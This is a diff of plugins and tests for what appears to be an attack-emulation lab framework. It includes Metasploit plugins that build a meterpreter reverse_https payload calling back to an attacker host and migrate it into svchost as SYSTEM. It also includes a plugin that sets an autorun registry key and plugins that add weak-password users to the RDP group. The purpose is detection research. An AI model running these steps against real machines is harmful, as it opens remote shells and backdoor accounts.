self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name
)
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res

@ -0,0 +1,48 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
import socket
class MetasploitMigratePlugin(AttackPlugin):
# Boilerplate
name = "metasploit_no_description"
ttp = "T1055"
references = ["https://attack.mitre.org/techniques/T1055/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name
)
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res

@ -0,0 +1,48 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
import socket
class MetasploitMigratePlugin(AttackPlugin):
# Boilerplate
description = "This one has no name"
ttp = "T1055"
references = ["https://attack.mitre.org/techniques/T1055/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name
)
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res

@ -0,0 +1,68 @@
#!/usr/bin/env python3
# Some users are created (with weak passwords) and sshd is set to allow password-based access
from plugins.base.vulnerability_plugin import VulnerabilityPlugin
class VulnerabilityOk(VulnerabilityPlugin):
# Boilerplate
name = "vulnerability_ok"
description = "Adding users with weak passwords"
references = ["https://attack.mitre.org/techniques/T1110/"]
required_files = [] # Files shipped with the plugin which are needed by the machine. Will be copied to the share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def start(self):
if self.machine_plugin.config.os() == "linux":
# Add vulnerable user
# mkpasswd -m sha-512 # To calc the passwd
# This is in the debian package "whois"
for user in self.conf["linux"]:
cmd = f"sudo useradd -m -p '{user['password']}' -s /bin/bash {user['name']}"
self.run_cmd(cmd)
elif self.machine_plugin.config.os() == "windows":
for user in self.conf["windows"]:
# net user username password /add
cmd = f"net user {user['name']} {user['password']} /add"
self.run_cmd(cmd)
for user in self.conf["windows"]:
# Adding the new users to RDP (just in case we want to test RDP)
cmd = f"""NET LOCALGROUP "Remote Desktop Users" {user['name']} /ADD"""
self.run_cmd(cmd)
else:
raise NotImplementedError
def stop(self):
if self.machine_plugin.config.os() == "linux":
for user in self.conf["linux"]:
# Remove user
cmd = f"sudo userdel -r {user['name']}"
self.run_cmd(cmd)
elif self.machine_plugin.config.os() == "windows":
for user in self.conf["windows"]:
# net user username /delete
cmd = f"net user {user['name']} /delete"
self.run_cmd(cmd)
# Remove the new users to RDP (just in case we want to test RDP)
for user in self.conf["windows"]:
# net user username /delete
cmd = f""""NET LOCALGROUP "Remote Desktop Users" {user['name']} /DELETE"""
self.run_cmd(cmd)
else:
raise NotImplementedError

@ -0,0 +1,43 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
from app.interface_sfx import CommandlineColors
class CalderaAutostartPlugin1(AttackPlugin):
# Boilerplate
name = "caldera_autostart_1"
description = "Setting a registry key for autostart"
ttp = "T1547.1"
references = ["https://attack.mitre.org/techniques/T1547/001/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.CALDERA]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
# HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
res = ""
self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}Starting caldera attack to add run key {CommandlineColors.ENDC}", 1)
self.caldera_attack(self.targets[0],
"163b023f43aba758d36f524d146cb8ea",
parameters={"command_to_execute": r"C:\\Windows\\system32\\calc.exe"},
tactics="Persistence",
tactics_id="TA0003",
situation_description="Setting an autorun key runonce")
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Ending caldera attack to add run key {CommandlineColors.ENDC}", 1)
return res

@ -0,0 +1,43 @@
#!/usr/bin/env python3
# A plugin to control already running vms
from plugins.base.machinery import MachineryPlugin, MachineStates
from plugins.base.ssh_features import SSHFeatures
class MachineryNoCreate(SSHFeatures, MachineryPlugin):
# Boilerplate
name = "machinery_no_create"
description = "A plugin to handle already running machines. The machine will not be started/stopped by this plugin"
required_files = [] # Files shipped with the plugin which are needed by the machine. Will be copied to the share
def __init__(self):
super().__init__()
self.plugin_path = __file__
self.vagrantfilepath = None
self.vagrantfile = None
def up(self):
""" Start a machine, create it if it does not exist """
return
def halt(self):
""" Halt a machine """
return
def destroy(self):
""" Destroy a machine """
return
def get_state(self):
""" Get detailed state of a machine """
return MachineStates.RUNNING
def get_ip(self):
""" Return the machine ip """
return self.config.vm_ip()

@ -0,0 +1,46 @@
#!/usr/bin/env python3
# A plugin to control already running vms
from plugins.base.machinery import MachineryPlugin, MachineStates
from plugins.base.ssh_features import SSHFeatures
class MachineryNoDestroy(SSHFeatures, MachineryPlugin):
# Boilerplate
name = "machinery_no_destroy"
description = "A plugin to handle already running machines. The machine will not be started/stopped by this plugin"
required_files = [] # Files shipped with the plugin which are needed by the machine. Will be copied to the share
def __init__(self):
super().__init__()
self.plugin_path = __file__
self.vagrantfilepath = None
self.vagrantfile = None
def create(self, reboot=True):
""" Create a machine
@param reboot: Reboot the VM during installation. Required if you want to install software
"""
return
def up(self):
""" Start a machine, create it if it does not exist """
return
def halt(self):
""" Halt a machine """
return
def get_state(self):
""" Get detailed state of a machine """
return MachineStates.RUNNING
def get_ip(self):
""" Return the machine ip """
return self.config.vm_ip()

@ -0,0 +1,46 @@
#!/usr/bin/env python3
# A plugin to control already running vms
from plugins.base.machinery import MachineryPlugin, MachineStates
from plugins.base.ssh_features import SSHFeatures
class MachineryNoHalt(SSHFeatures, MachineryPlugin):
# Boilerplate
name = "machinery_no_halt"
description = "A plugin to handle already running machines. The machine will not be started/stopped by this plugin"
required_files = [] # Files shipped with the plugin which are needed by the machine. Will be copied to the share
def __init__(self):
super().__init__()
self.plugin_path = __file__
self.vagrantfilepath = None
self.vagrantfile = None
def create(self, reboot=True):
""" Create a machine
@param reboot: Reboot the VM during installation. Required if you want to install software
"""
return
def up(self):
""" Start a machine, create it if it does not exist """
return
def destroy(self):
""" Destroy a machine """
return
def get_state(self):
""" Get detailed state of a machine """
return MachineStates.RUNNING
def get_ip(self):
""" Return the machine ip """
return self.config.vm_ip()

@ -0,0 +1,45 @@
#!/usr/bin/env python3
# A plugin to control already running vms
from plugins.base.machinery import MachineryPlugin, MachineStates
from plugins.base.ssh_features import SSHFeatures
class MachineryNoIp(SSHFeatures, MachineryPlugin):
# Boilerplate
name = "machinery_no_ip"
description = "A plugin to handle already running machines. The machine will not be started/stopped by this plugin"
required_files = [] # Files shipped with the plugin which are needed by the machine. Will be copied to the share
def __init__(self):
super().__init__()
self.plugin_path = __file__
self.vagrantfilepath = None
self.vagrantfile = None
def create(self, reboot=True):
""" Create a machine
@param reboot: Reboot the VM during installation. Required if you want to install software
"""
return
def up(self):
""" Start a machine, create it if it does not exist """
return
def halt(self):
""" Halt a machine """
return
def destroy(self):
""" Destroy a machine """
return
def get_state(self):
""" Get detailed state of a machine """
return MachineStates.RUNNING

@ -0,0 +1,45 @@
#!/usr/bin/env python3
# A plugin to control already running vms
from plugins.base.machinery import MachineryPlugin
from plugins.base.ssh_features import SSHFeatures
class MachineryNoState(SSHFeatures, MachineryPlugin):
# Boilerplate
name = "machinery_no_state"
description = "A plugin to handle already running machines. The machine will not be started/stopped by this plugin"
required_files = [] # Files shipped with the plugin which are needed by the machine. Will be copied to the share
def __init__(self):
super().__init__()
self.plugin_path = __file__
self.vagrantfilepath = None
self.vagrantfile = None
def create(self, reboot=True):
""" Create a machine
@param reboot: Reboot the VM during installation. Required if you want to install software
"""
return
def up(self):
""" Start a machine, create it if it does not exist """
return
def halt(self):
""" Halt a machine """
return
def destroy(self):
""" Destroy a machine """
return
def get_ip(self):
""" Return the machine ip """
return self.config.vm_ip()

@ -0,0 +1,46 @@
#!/usr/bin/env python3
# A plugin to control already running vms
from plugins.base.machinery import MachineryPlugin, MachineStates
from plugins.base.ssh_features import SSHFeatures
class MachineryNoUp(SSHFeatures, MachineryPlugin):
# Boilerplate
name = "machinery_no_up"
description = "A plugin to handle already running machines. The machine will not be started/stopped by this plugin"
required_files = [] # Files shipped with the plugin which are needed by the machine. Will be copied to the share
def __init__(self):
super().__init__()
self.plugin_path = __file__
self.vagrantfilepath = None
self.vagrantfile = None
def create(self, reboot=True):
""" Create a machine
@param reboot: Reboot the VM during installation. Required if you want to install software
"""
return
def halt(self):
""" Halt a machine """
return
def destroy(self):
""" Destroy a machine """
return
def get_state(self):
""" Get detailed state of a machine """
return MachineStates.RUNNING
def get_ip(self):
""" Return the machine ip """
return self.config.vm_ip()

@ -0,0 +1,50 @@
#!/usr/bin/env python3
# A plugin to control already running vms
from plugins.base.machinery import MachineryPlugin, MachineStates
from plugins.base.ssh_features import SSHFeatures
class MachineryOk(SSHFeatures, MachineryPlugin):
# Boilerplate
name = "machinery_ok"
description = "A plugin to handle already running machines. The machine will not be started/stopped by this plugin"
required_files = [] # Files shipped with the plugin which are needed by the machine. Will be copied to the share
def __init__(self):
super().__init__()
self.plugin_path = __file__
self.vagrantfilepath = None
self.vagrantfile = None
def create(self, reboot=True):
""" Create a machine
@param reboot: Reboot the VM during installation. Required if you want to install software
"""
return
def up(self):
""" Start a machine, create it if it does not exist """
return
def halt(self):
""" Halt a machine """
return
def destroy(self):
""" Destroy a machine """
return
def get_state(self):
""" Get detailed state of a machine """
return MachineStates.RUNNING
def get_ip(self):
""" Return the machine ip """
return self.config.vm_ip()

@ -0,0 +1,49 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
import socket
class MetasploitMigratePlugin(AttackPlugin):
# Boilerplate
name = "metasploit_migrate"
description = "Migrate meterpreter to another process via metasploit"
ttp = "T1055"
references = ["https://attack.mitre.org/techniques/T1055/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name
)
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res

@ -0,0 +1,94 @@
#!/usr/bin/env python3
# A plugin to experiment with Linux logstash filebeat sensors
from plugins.base.sensor import SensorPlugin
import os
from jinja2 import Environment, FileSystemLoader, select_autoescape
class SensorMissingCollectPlugin(SensorPlugin):
# Boilerplate
name = "missing_collect"
description = "Linux filebeat plugin"
required_files = ["filebeat.conf",
"filebeat.yml",
]
def __init__(self):
super().__init__()
self.plugin_path = __file__
self.debugit = False
def process_templates(self):
""" process jinja2 templates of the config files and insert own config """
env = Environment(
loader=FileSystemLoader(self.get_plugin_path(), encoding='utf-8', followlinks=False),
autoescape=select_autoescape()
)
template = env.get_template("filebeat_template.conf")
dest = os.path.join(self.get_plugin_path(), "filebeat.conf")
with open(dest, "wt") as fh:
res = template.render({"playground": self.get_playground()})
fh.write(res)
def prime(self):
""" Hard-core install. Requires a reboot """
# For reference: This is the core config we will need. In addition there are two reg files to apply to the registry
# sc control aswbidsagent 255
# timeout /t 5
# 'copy /y "cd %userprofile% & aswidptestdll.dll" "c:\Program Files\Avast Software\Avast\"'
# reg.exe add "HKLM\SOFTWARE\Avast Software\Avast\properties\IDP\Setting" /v debug_channel.enabled /t REG_DWORD /d 1 /f
# timeout /t 2
# sc start aswbidsagent
# Important: AV must be 21.2
# dll_name = self.conf["dll_name"]
# idp_tool_folder = self.conf["idp_tool_folder"]
pg = self.get_playground()
self.vprint("Installing Linux filebeat sensor", 3)
self.run_cmd("sudo wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -")
self.run_cmd('sudo echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-7.x.list')
self.run_cmd("sudo apt update")
self.run_cmd("sudo apt -y install default-jre")
self.run_cmd("sudo apt -y install logstash")
self.run_cmd("sudo apt -y install filebeat")
# Copy config
self.run_cmd(f"sudo cp {pg}/filebeat.yml /etc/filebeat/filebeat.yml")
self.run_cmd(f"sudo cp {pg}/filebeat.conf /etc/logstash/conf.d")
# Cleanup
self.run_cmd(f"rm {pg}/filebeat.json")
self.run_cmd(f"touch {pg}/filebeat.json")
self.run_cmd(f"chmod o+w {pg}/filebeat.json")
return False
def install(self):
""" Installs the filebeat sensor """
return
def start(self):
self.run_cmd("sudo filebeat modules enable system,iptables")
self.run_cmd("sudo filebeat setup --pipelines --modules iptables,system,")
self.run_cmd("sudo systemctl enable filebeat")
self.run_cmd("sudo systemctl start filebeat")
self.run_cmd("sudo systemctl enable logstash.service")
self.run_cmd("sudo systemctl start logstash.service")
return None
def stop(self):
""" Stop the sensor """
return

@ -0,0 +1,102 @@
#!/usr/bin/env python3
# A plugin to experiment with Linux logstash filebeat sensors
from plugins.base.sensor import SensorPlugin
import os
from jinja2 import Environment, FileSystemLoader, select_autoescape
class SensorOkPlugin(SensorPlugin):
# Boilerplate
name = "sensor_ok"
description = "Linux filebeat plugin"
required_files = ["filebeat.conf",
"filebeat.yml",
]
def __init__(self):
super().__init__()
self.plugin_path = __file__
self.debugit = False
def process_templates(self):
""" process jinja2 templates of the config files and insert own config """
env = Environment(
loader=FileSystemLoader(self.get_plugin_path(), encoding='utf-8', followlinks=False),
autoescape=select_autoescape()
)
template = env.get_template("filebeat_template.conf")
dest = os.path.join(self.get_plugin_path(), "filebeat.conf")
with open(dest, "wt") as fh:
res = template.render({"playground": self.get_playground()})
fh.write(res)
def prime(self):
""" Hard-core install. Requires a reboot """
# For reference: This is the core config we will need. In addition there are two reg files to apply to the registry
# sc control aswbidsagent 255
# timeout /t 5
# 'copy /y "cd %userprofile% & aswidptestdll.dll" "c:\Program Files\Avast Software\Avast\"'
# reg.exe add "HKLM\SOFTWARE\Avast Software\Avast\properties\IDP\Setting" /v debug_channel.enabled /t REG_DWORD /d 1 /f
# timeout /t 2
# sc start aswbidsagent
# Important: AV must be 21.2
# dll_name = self.conf["dll_name"]
# idp_tool_folder = self.conf["idp_tool_folder"]
pg = self.get_playground()
self.vprint("Installing Linux filebeat sensor", 3)
self.run_cmd("sudo wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -")
self.run_cmd('sudo echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-7.x.list')
self.run_cmd("sudo apt update")
self.run_cmd("sudo apt -y install default-jre")
self.run_cmd("sudo apt -y install logstash")
self.run_cmd("sudo apt -y install filebeat")
# Copy config
self.run_cmd(f"sudo cp {pg}/filebeat.yml /etc/filebeat/filebeat.yml")
self.run_cmd(f"sudo cp {pg}/filebeat.conf /etc/logstash/conf.d")
# Cleanup
self.run_cmd(f"rm {pg}/filebeat.json")
self.run_cmd(f"touch {pg}/filebeat.json")
self.run_cmd(f"chmod o+w {pg}/filebeat.json")
return False
def install(self):
""" Installs the filebeat sensor """
return
def start(self):
self.run_cmd("sudo filebeat modules enable system,iptables")
self.run_cmd("sudo filebeat setup --pipelines --modules iptables,system,")
self.run_cmd("sudo systemctl enable filebeat")
self.run_cmd("sudo systemctl start filebeat")
self.run_cmd("sudo systemctl enable logstash.service")
self.run_cmd("sudo systemctl start logstash.service")
return None
def stop(self):
""" Stop the sensor """
return
def collect(self, path):
""" Collect sensor data """
pg = self.get_playground()
dst = os.path.join(path, "filebeat.json")
self.get_from_machine(f"{pg}/filebeat.json", dst) # nosec
return [dst]

@ -0,0 +1,102 @@
#!/usr/bin/env python3
# A plugin to experiment with Linux logstash filebeat sensors
from plugins.base.sensor import SensorPlugin
import os
from jinja2 import Environment, FileSystemLoader, select_autoescape
class SensorIgnoreMePlugin(SensorPlugin):
# Boilerplate
name = "ignore_me"
description = "Linux filebeat plugin"
required_files = ["filebeat.conf",
"filebeat.yml",
]
def __init__(self):
super().__init__()
self.plugin_path = __file__
self.debugit = False
def process_templates(self):
""" process jinja2 templates of the config files and insert own config """
env = Environment(
loader=FileSystemLoader(self.get_plugin_path(), encoding='utf-8', followlinks=False),
autoescape=select_autoescape()
)
template = env.get_template("filebeat_template.conf")
dest = os.path.join(self.get_plugin_path(), "filebeat.conf")
with open(dest, "wt") as fh:
res = template.render({"playground": self.get_playground()})
fh.write(res)
def prime(self):
""" Hard-core install. Requires a reboot """
# For reference: This is the core config we will need. In addition there are two reg files to apply to the registry
# sc control aswbidsagent 255
# timeout /t 5
# 'copy /y "cd %userprofile% & aswidptestdll.dll" "c:\Program Files\Avast Software\Avast\"'
# reg.exe add "HKLM\SOFTWARE\Avast Software\Avast\properties\IDP\Setting" /v debug_channel.enabled /t REG_DWORD /d 1 /f
# timeout /t 2
# sc start aswbidsagent
# Important: AV must be 21.2
# dll_name = self.conf["dll_name"]
# idp_tool_folder = self.conf["idp_tool_folder"]
pg = self.get_playground()
self.vprint("Installing Linux filebeat sensor", 3)
self.run_cmd("sudo wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -")
self.run_cmd('sudo echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-7.x.list')
self.run_cmd("sudo apt update")
self.run_cmd("sudo apt -y install default-jre")
self.run_cmd("sudo apt -y install logstash")
self.run_cmd("sudo apt -y install filebeat")
# Copy config
self.run_cmd(f"sudo cp {pg}/filebeat.yml /etc/filebeat/filebeat.yml")
self.run_cmd(f"sudo cp {pg}/filebeat.conf /etc/logstash/conf.d")
# Cleanup
self.run_cmd(f"rm {pg}/filebeat.json")
self.run_cmd(f"touch {pg}/filebeat.json")
self.run_cmd(f"chmod o+w {pg}/filebeat.json")
return False
def install(self):
""" Installs the filebeat sensor """
return
def start(self):
self.run_cmd("sudo filebeat modules enable system,iptables")
self.run_cmd("sudo filebeat setup --pipelines --modules iptables,system,")
self.run_cmd("sudo systemctl enable filebeat")
self.run_cmd("sudo systemctl start filebeat")
self.run_cmd("sudo systemctl enable logstash.service")
self.run_cmd("sudo systemctl start logstash.service")
return None
def stop(self):
""" Stop the sensor """
return
def collect(self, path):
""" Collect sensor data """
pg = self.get_playground()
dst = os.path.join(path, "filebeat.json")
self.get_from_machine(f"{pg}/filebeat.json", dst) # nosec
return [dst]

@ -0,0 +1,102 @@
#!/usr/bin/env python3
# A plugin to experiment with Linux logstash filebeat sensors
from plugins.base.sensor import SensorPlugin
import os
from jinja2 import Environment, FileSystemLoader, select_autoescape
class SensorPickMePlugin(SensorPlugin):
# Boilerplate
name = "pick_me"
description = "Linux filebeat plugin"
required_files = ["filebeat.conf",
"filebeat.yml",
]
def __init__(self):
super().__init__()
self.plugin_path = __file__
self.debugit = False
def process_templates(self):
""" process jinja2 templates of the config files and insert own config """
env = Environment(
loader=FileSystemLoader(self.get_plugin_path(), encoding='utf-8', followlinks=False),
autoescape=select_autoescape()
)
template = env.get_template("filebeat_template.conf")
dest = os.path.join(self.get_plugin_path(), "filebeat.conf")
with open(dest, "wt") as fh:
res = template.render({"playground": self.get_playground()})
fh.write(res)
def prime(self):
""" Hard-core install. Requires a reboot """
# For reference: This is the core config we will need. In addition there are two reg files to apply to the registry
# sc control aswbidsagent 255
# timeout /t 5
# 'copy /y "cd %userprofile% & aswidptestdll.dll" "c:\Program Files\Avast Software\Avast\"'
# reg.exe add "HKLM\SOFTWARE\Avast Software\Avast\properties\IDP\Setting" /v debug_channel.enabled /t REG_DWORD /d 1 /f
# timeout /t 2
# sc start aswbidsagent
# Important: AV must be 21.2
# dll_name = self.conf["dll_name"]
# idp_tool_folder = self.conf["idp_tool_folder"]
pg = self.get_playground()
self.vprint("Installing Linux filebeat sensor", 3)
self.run_cmd("sudo wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -")
self.run_cmd('sudo echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-7.x.list')
self.run_cmd("sudo apt update")
self.run_cmd("sudo apt -y install default-jre")
self.run_cmd("sudo apt -y install logstash")
self.run_cmd("sudo apt -y install filebeat")
# Copy config
self.run_cmd(f"sudo cp {pg}/filebeat.yml /etc/filebeat/filebeat.yml")
self.run_cmd(f"sudo cp {pg}/filebeat.conf /etc/logstash/conf.d")
# Cleanup
self.run_cmd(f"rm {pg}/filebeat.json")
self.run_cmd(f"touch {pg}/filebeat.json")
self.run_cmd(f"chmod o+w {pg}/filebeat.json")
return False
def install(self):
""" Installs the filebeat sensor """
return
def start(self):
self.run_cmd("sudo filebeat modules enable system,iptables")
self.run_cmd("sudo filebeat setup --pipelines --modules iptables,system,")
self.run_cmd("sudo systemctl enable filebeat")
self.run_cmd("sudo systemctl start filebeat")
self.run_cmd("sudo systemctl enable logstash.service")
self.run_cmd("sudo systemctl start logstash.service")
return None
def stop(self):
""" Stop the sensor """
return
def collect(self, path):
""" Collect sensor data """
pg = self.get_playground()
dst = os.path.join(path, "filebeat.json")
self.get_from_machine(f"{pg}/filebeat.json", dst) # nosec
return [dst]

@ -0,0 +1,43 @@
#!/usr/bin/env python3
# Some users are created (with weak passwords) and sshd is set to allow password-based access
from plugins.base.vulnerability_plugin import VulnerabilityPlugin
class VulnerabilityOk(VulnerabilityPlugin):
# Boilerplate
name = "missing_start"
description = "Adding users with weak passwords"
ttp = "T1110"
references = ["https://attack.mitre.org/techniques/T1110/"]
required_files = [] # Files shipped with the plugin which are needed by the machine. Will be copied to the share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def stop(self):
if self.machine_plugin.config.os() == "linux":
for user in self.conf["linux"]:
# Remove user
cmd = f"sudo userdel -r {user['name']}"
self.run_cmd(cmd)
elif self.machine_plugin.config.os() == "windows":
for user in self.conf["windows"]:
# net user username /delete
cmd = f"net user {user['name']} /delete"
self.run_cmd(cmd)
# Remove the new users to RDP (just in case we want to test RDP)
for user in self.conf["windows"]:
# net user username /delete
cmd = f""""NET LOCALGROUP "Remote Desktop Users" {user['name']} /DELETE"""
self.run_cmd(cmd)
else:
raise NotImplementedError

@ -0,0 +1,46 @@
#!/usr/bin/env python3
# Some users are created (with weak passwords) and sshd is set to allow password-based access
from plugins.base.vulnerability_plugin import VulnerabilityPlugin
class VulnerabilityOk(VulnerabilityPlugin):
# Boilerplate
name = "missing_stop"
description = "Adding users with weak passwords"
ttp = "T1110"
references = ["https://attack.mitre.org/techniques/T1110/"]
required_files = [] # Files shipped with the plugin which are needed by the machine. Will be copied to the share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def start(self):
if self.machine_plugin.config.os() == "linux":
# Add vulnerable user
# mkpasswd -m sha-512 # To calc the passwd
# This is in the debian package "whois"
for user in self.conf["linux"]:
cmd = f"sudo useradd -m -p '{user['password']}' -s /bin/bash {user['name']}"
self.run_cmd(cmd)
elif self.machine_plugin.config.os() == "windows":
for user in self.conf["windows"]:
# net user username password /add
cmd = f"net user {user['name']} {user['password']} /add"
self.run_cmd(cmd)
for user in self.conf["windows"]:
# Adding the new users to RDP (just in case we want to test RDP)
cmd = f"""NET LOCALGROUP "Remote Desktop Users" {user['name']} /ADD"""
self.run_cmd(cmd)
else:
raise NotImplementedError

@ -0,0 +1,69 @@
#!/usr/bin/env python3
# Some users are created (with weak passwords) and sshd is set to allow password-based access
from plugins.base.vulnerability_plugin import VulnerabilityPlugin
class VulnerabilityOk(VulnerabilityPlugin):
# Boilerplate
name = "vulnerability_ok"
description = "Adding users with weak passwords"
ttp = "T1110"
references = ["https://attack.mitre.org/techniques/T1110/"]
required_files = [] # Files shipped with the plugin which are needed by the machine. Will be copied to the share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def start(self):
if self.machine_plugin.config.os() == "linux":
# Add vulnerable user
# mkpasswd -m sha-512 # To calc the passwd
# This is in the debian package "whois"
for user in self.conf["linux"]:
cmd = f"sudo useradd -m -p '{user['password']}' -s /bin/bash {user['name']}"
self.run_cmd(cmd)
elif self.machine_plugin.config.os() == "windows":
for user in self.conf["windows"]:
# net user username password /add
cmd = f"net user {user['name']} {user['password']} /add"
self.run_cmd(cmd)
for user in self.conf["windows"]:
# Adding the new users to RDP (just in case we want to test RDP)
cmd = f"""NET LOCALGROUP "Remote Desktop Users" {user['name']} /ADD"""
self.run_cmd(cmd)
else:
raise NotImplementedError
def stop(self):
if self.machine_plugin.config.os() == "linux":
for user in self.conf["linux"]:
# Remove user
cmd = f"sudo userdel -r {user['name']}"
self.run_cmd(cmd)
elif self.machine_plugin.config.os() == "windows":
for user in self.conf["windows"]:
# net user username /delete
cmd = f"net user {user['name']} /delete"
self.run_cmd(cmd)
# Remove the new users to RDP (just in case we want to test RDP)
for user in self.conf["windows"]:
# net user username /delete
cmd = f""""NET LOCALGROUP "Remote Desktop Users" {user['name']} /DELETE"""
self.run_cmd(cmd)
else:
raise NotImplementedError

@ -6,6 +6,7 @@ import unittest
# import os
from app.config import ExperimentConfig, MachineConfig
from app.exceptions import ConfigurationError
from dotmap import DotMap
# https://docs.python.org/3/library/unittest.html
@ -21,481 +22,429 @@ class TestMachineConfig(unittest.TestCase):
def test_basic_init(self):
""" The init is basic and working """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"}))
self.assertEqual(mc.raw_config["root"], "systems/attacker1")
self.assertEqual(mc.raw_config["vm_controller"]["type"], "vagrant")
def test_missing_vm_name(self):
""" The vm name is missing """
with self.assertRaises(ConfigurationError):
MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
}})
self.assertEqual(mc.raw_config.vm_controller.vm_type, "vagrant")
def test_use_existing_machine_is_true(self):
""" Testing use_existing:machine setting """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": True})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": True}))
self.assertEqual(mc.use_existing_machine(), True)
def test_use_existing_machine_is_false(self):
""" Testing use_existing:machine setting """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.use_existing_machine(), False)
def test_use_existing_machine_is_default(self):
""" Testing use_existing:machine setting """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"}))
self.assertEqual(mc.use_existing_machine(), False)
def test_windows_is_valid_os(self):
""" Testing if windows is valid os """
mc = MachineConfig({"root": "systems/attacker1",
"os": "windows",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "windows",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"}))
self.assertEqual(mc.os(), "windows")
def test_windows_is_valid_os_casefix(self):
""" Testing if windows is valid os - using lowercase fix"""
mc = MachineConfig({"root": "systems/attacker1",
"os": "WINDOWS",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "WINDOWS",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"}))
self.assertEqual(mc.os(), "windows")
